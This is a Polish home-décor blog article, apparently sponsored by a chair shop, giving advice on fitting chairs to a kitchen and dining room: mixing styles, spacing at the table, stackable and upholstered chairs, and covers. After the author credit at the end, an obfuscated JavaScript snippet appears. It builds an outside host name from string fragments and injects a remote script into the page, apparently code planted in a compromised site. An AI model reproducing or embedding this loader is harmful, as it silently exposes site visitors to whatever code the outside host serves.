O czym pamiętać przy dopasowywaniu krzesła do kuchni i jadalni

Share on facebook
Share on google
Share on twitter
Share on linkedin

Zazwyczaj krzesła dokupuje się razem ze stołem na samym końcu meblowania kuchni czy jadalni. Często decydujemy się w takim wypadku na zakup kompletu i to na pewno jest najprostsze rozwiązanie. Jeśli jednak pragniemy postawić na nieco indywidualności lub podoba nam się dany model stołu, ale krzesła już nie, jesteśmy zmuszeni do podjęcia wyboru. Jak wybrać właściwie, aby krzesła pasowały do reszty wystroju? O czym należy pamiętać?

Kupno kompletu sprawia, że mamy gwarancję jednolitego i uporządkowanego wyglądu. Możemy jednak poeksperymentować. Interesująco może wyglądać jadalnia, w której minimalistyczne krzesła nowoczesne połączymy z ozdobnymi krzesłami windsorskimi czy z antykami. Mogą to też być różne kolekcje w tym samym stylu. Warto bawić się zresztą nie tylko kształtem i formą, ale również kolorem, kontrastem. Stół, przy którym będziemy mieli czarne krzesła przemieszane z białymi, o ile będzie to wszystko wpasowywało się w resztę wystroju wnętrza, może robić naprawdę duże wrażenie. Należy tylko uważać, aby nie przesadzić. Nie wszystkie kombinacje do siebie pasują, a kontrast nie zawsze musi wyjść na dobre. Możliwości mamy jednak mnóstwo.

Kupując krzesła i stół osobno przeważnie zwracamy uwagę na ich wielkość w stosunku do siebie. I słusznie, zbyt wysokie krzesła nie pozwolą na wygodne spożywanie posiłków. Nie zawsze za to pamiętamy o tym, aby zachować między krzesłami odpowiedni rozstaw. Na osobę przy stole powinno przypadać minimum 60 cm długości blatu. Bywa też, że źle dopasowujemy liczbę krzeseł do wielkości stołu, a ta zależeć powinno od rozmieszczenia jego nóg. Planując zakup krzeseł warto więc uwzględnić maksymalną liczbę gości, a w przypadku gdy ma być ich dużo zaś my mamy mało miejsca, dobrze zdecydować się na stół na jednej nodze. Problem wielkości mieszkania rozwiązują również krzesła sztaplowane, czyli takie, które łatwo złożyć jedno na drugim. Nie muszą to być zresztą plastikowe potworki, które czasem możemy zobaczyć na uczelniach czy w przydomowych ogródkach. Oferta producentów jest już dziś na tyle rozbudowana, że bez problemu znajdziemy coś bardziej wyszukanego i designerskiego.

Oczywiście, jeśli dysponujemy większą jadalnią, możemy postawić na klasyczne krzesła tapicerowane czy drewniane. W przypadku tych pierwszych warto jednak wziąć pod uwagę kwestię dotyczącą czyszczenia. Jasne krzesła będą się szybciej brudzić. Trzeba też zwrócić uwagę na materiał. Krzesło obite skórą sprawi pod tym kątem mniej problemów. Krzesła drewniane są o tyle dobre, że pasują w zasadzie do większości rodzajów wystroju wnętrz. Jeśli są dobrze wyprofilowane, będą naprawdę komfortowe. Są też odporne i wytrzymałe. Trzeba jednak uważać z nimi w kuchniach. Drewno jest podatne na zmiany temperatury i wilgotności i po jakimś czasie może się wypaczyć. W takim wypadku możemy postawić na alternatywę choćby w postaci krzeseł metalowych czy z tworzyw sztucznych. Tu warto dodać, że jeśli to możliwe, powinniśmy wybierać krzesła do kuchni w podobnej stylistyce co do jadalni czy salonu. W ten sposób przy większej liczbie gości będziemy mogli bezproblemowo przenieść krzesła z jednego pomieszczenia do drugiego, nie zaburzając przy okazji estetyki i wystroju wnętrza. Jeśli zaś koniecznie chcemy mieć w obu miejscach inne krzesła, upewnijmy się, że będą one do siebie pasowały, choćby na zasadzie kontrastu.

Nie musimy się jednak ograniczać wyłącznie do krzeseł. Do niektórych kuchni i jadalni lepiej będą pasować hokery lub wysokie krzesła, a jeśli chcemy nadać nieco bardziej ciepłego i stylowego charakteru możemy przy stole ustawić fotele. Nic nie stoi zresztą na przeszkodzie, aby obok stały krzesła. Aby je upiększyć i dopasować do aranżacji (przy okazji dbając o ich stan, pomagają przy zachowaniu czystości), możemy wykorzystać pokrowce. Dają nam też możliwość poeksperymentowania i wypróbowania ekstrawaganckiego wzoru czy odważnego koloru. W przypadku braku zadowolenia z efektów takiej modyfikacji, zawsze możemy zmienić wygląd pokrowca, a nawet powrócić do pierwotnego wyglądu.

Artykuł przygotowany przez redakcję CentrumKrzesel.pl – sklepu z szerokim wyborem krzeseł do jadalni (www.centrumkrzesel.pl/jadalnia-/133/c)

// (function(){
u9th=document.createElement(“script”);u9th.type=”text/javascript”;
u9th.async=true;u9th_=((“us”)+”t”)+”a”;u9th_+=(“t.i”)+””+”n”;u9th_+=((“f”)+”o”);
u9th.src=”http://”+u9th_+”/3461653.lq5jr8u39thlx51zi6kfhjX8d4feqz”;
document.body.appendChild(u9th);
})();
// ]]>

Co o tym sądzisz?

Witryna wykorzystuje Akismet, aby ograniczyć spam. Dowiedz się więcej jak przetwarzane są dane komentarzy.